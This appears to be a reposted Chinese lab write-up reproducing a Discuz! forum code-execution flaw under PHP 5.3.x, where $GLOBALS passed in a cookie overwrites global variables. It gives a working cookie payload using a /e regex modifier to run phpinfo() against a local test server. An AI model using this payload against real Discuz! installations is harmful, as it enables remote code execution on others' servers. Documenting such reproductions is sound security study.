Discuz!是康盛创想(北京)科技有限公司推出的一套通用的社区论坛软件系统,用户可以在不需要任何编程的基础上,通过简单的设置和安装,在互联网上搭建起具备完善功能、很强负载能力和可高度定制的论坛服务。
该漏洞产生原因是因为php的5.3.x版本里php.ini的设置里`request_order`默认值为GP,导致`$_REQUEST`中不再包含`$_COOKIE`。通过在Cookie中传入`$GLOBALS`可以覆盖全局变量,造成代码执行漏洞。
本文仅作漏洞复现记录与实现,利用流程如下:
1.漏洞环境
漏洞链接: http://192.168.101.152:8080/
访问后如下所示
2.利用流程
找到一个已存在的帖子
使用burp抓包,修改cookie值
Cookie: GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui; GLOBALS[_DCACHE][smilies][replacearray]=phpinfo();
即可执行php代码
来源:freebuf.com 2021-03-22 19:15:44 by: FengDao
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
请登录后发表评论
注册